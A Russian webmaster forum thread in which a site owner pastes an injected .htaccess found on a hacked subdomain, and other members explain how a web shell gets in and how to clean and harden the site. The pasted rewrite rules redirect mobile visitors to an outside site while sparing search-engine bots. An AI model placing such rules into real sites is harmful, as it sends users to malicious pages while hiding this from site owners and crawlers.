Форум Сайтостроение Администрирование серверов

в папках хостинга странный .htaccess нужна помощь

12
Бабайка
На сайте с 05.08.2010
Offline
135
Бабайка
1033

Всем привет!

Не знаю в какой раздел писать правильнее, но собсно есть проблема!

работал сегодня с файлами поддомена (поддомен с html файлами) и обнаружил что файлы .htaccess имеют неправильный вид внутри. Хотя дата модификации файлов того же числа что и была изначально (т.е. когда заливал файлы в директорию).

Вид кода файла 


RewriteEngine on

RewriteCond %{HTTP_USER_AGENT} (android|midp|j2me|symbian|series\ 60|symbos|windows\ mobile|windows\ ce|ppc|smartphone|blackberry|mtk|iemobile|nokia|ucweb|ucbrowser) [NC]

RewriteCond %{HTTP_USER_AGENT} !(bot|accoona|ia_archiver|antabot|ask\ jeeves|baidu|eltaindexer|feedfetcher|gamespy|gigabot|googlebot|gsa-crawler|grub-client|gulper|slurp|mihalism|msnbot|worldindexer|ooyyo|pagebull|scooter|w3c_validator|jigsaw|webalta|yahoofeedseeker|mmcrawler|yandexbot|yandeximages|yandexvideo|yandexmedia|yandexblogs|yandexaddurl|yandexfavicons|yandexdirect|yandexmetrika|yandexcatalog|yandexnews|yandeximageresizer) [NC]

RewriteRule (.*) http://sitename.com [L,R=302] #

DirectoryIndex index.html

В результате, если заходят с мобильных версий устройств на сайт - пользователи перенаправляются на какойто вирусняковый сайт.

Особо не интересует для каких целей это сделано - и так понятно.

Вопрос в следующем - как? это же отдельная директория (поддомен). На основном домене стоит wp. Неужели злоумышленники могут имея доступ к файлам WP, который находится в отдельной папке для домена получить доступ ко всем файлам и папкам не относящимся к данному домену? это же фтп доступ получается? Ведь вложенность папок отсутствует.

Спецы, подскажите как? и как с этим бороться?

Den73
На сайте с 26.06.2010
Offline
523
Den73
#1

могут иметь доступ ко всем файлам принадлежащем вашему пользователю на сервере хостинга, тоесть ко всем сайтам)))

A
На сайте с 12.12.2008
Offline
226
ardova
#2

Бабайка, Айболитом попробуйте, если не получится, здесь полно, тех, кто чистит сайты.

Бабайка
На сайте с 05.08.2010
Offline
135
Бабайка
#3

Понял. спасибо за ответы!

F9
На сайте с 13.04.2008
Offline
104
for93t
#4
Бабайка:
Вопрос в следующем - как?

Хакер находит одну маааленькую уязвимость, заливает с ее помощью web-шелл, и в результате

Бабайка:
это же фтп доступ получается

Именно. Причем современные web-шеллы иногда превосходят по функционалу даже навороченные ftp-клиенты.

Бабайка:
Спецы, подскажите как? и как с этим бороться?

Панацеи нет. Пристальный мониторинг и своевременное обновление ПО, на котором крутится сайт делают работу взломщика сложнее. Но 100% гарантий от взлома вряд ли кто даст. Можно так настроить права доступа к файлам и папкам, чтобы пользователь, из-под которого работает web-сервер не мог изменять файлы. Можно загнать web-сервер в chroot. В каждом конкретном случае нужно рассматривать несколько решений и выбирать оптимальное. Но, повторюсь, абсолютной и универсальной защиты не существует.

Уязвимости и права доступа Как вылечить сайт от Вирус на хостинге -
6666
На сайте с 10.01.2005
Offline
505
6666
#5
for93t:
Панацеи нет.

Нормальная настройка и все в порядке. Хакер не будет возиться несколько суток что бы заработать три доллара. Проверил на основные уязвимости - Нету? Пошел ломать следующего.

А вообще Вам в раздел "вебстроительство", в прилепленный топик. Там и ссылки на ПО и все такое.

Каждое мое сообщение проверила и одобрила Елена Летучая. (c) Для меня очень важно все что Вы говорите! (http://surrealism.ru/123.mp3) .
Как узнать, будет ли Видит ли ПС Гугл Переезд на новый домен
P
На сайте с 09.05.2013
Offline
5
paycontent
#6
6666:
Нормальная настройка и все в порядке. Хакер не будет возиться несколько суток что бы заработать три доллара. Проверил на основные уязвимости - Нету? Пошел ломать следующего.

правильно, зачем им ломать индивидуально сайт, если им проще проверить одну конкретную уязвимость по заранее спарсенной базе wp сайтов

ограничить возможность взломщику можно достаточно серьезно при помощи фильтрации параметров на уровне того же mod_security

Пишу статьи для продвижения в MiraLinks (/ru/forum/794039) за 100 рублей/статья!
Подскажите, как сделать грамотно? Как защитить сайт и Странный .htaccess. Это вирус???
demon2005
На сайте с 06.02.2010
Offline
173
demon2005
#7

права на htaccess ограничить надо

Машины должны работать. Люди должны думать. (Девиз компании "IBM") Хостинг ( http://goo.gl/em6I5 ), рекомендую. Код на скидку 965VI5O60E Выгодно купить/продать сайт ( http://www.telderi.ru/?pid=c0fb22 )
Бабайка
На сайте с 05.08.2010
Offline
135
Бабайка
#8

Спасибо, коллеги!

6666
На сайте с 10.01.2005
Offline
505
6666
#9
demon2005:
права на htaccess ограничить надо
__________________

..ну не надо фигню только советовать, а? Если у хакера доступ по ФТП, то ему насрать на то, какие стоят права доступа у htaccess

AS
На сайте с 09.02.2013
Offline
15
Alexey_Scherbakov
#10
Бабайка:
Спасибо, коллеги!

В кач-ве лечения могу посоветовать следующее:

1) Делаем полный бэкап (и база и файлы).

2) Отключите все плагины.

3) Сделайте дамп базы данных(другими словами бэкап).

4) Поставьте чистый WP.

5) Импортируйте дамп в новую базу.

6) Установите все плагины и ок)

У моего клиента была подобная ситуация, но мы пропустили пункт 2, 5 и ничего не случилось. Но для надёжности рекомендую воспользоваться алгоритмом. Пункты, которые может сделать тех. поддержка хостинга (если он дорожит клиентами) - 1, 3, 5

P.s. Если что спрашивайте, буду рад помочь.

WP Проблема при переносе Сателлиты на Joomla 1.5 Как скопировать VDS
12

Авторизуйтесь или зарегистрируйтесь, чтобы оставить комментарий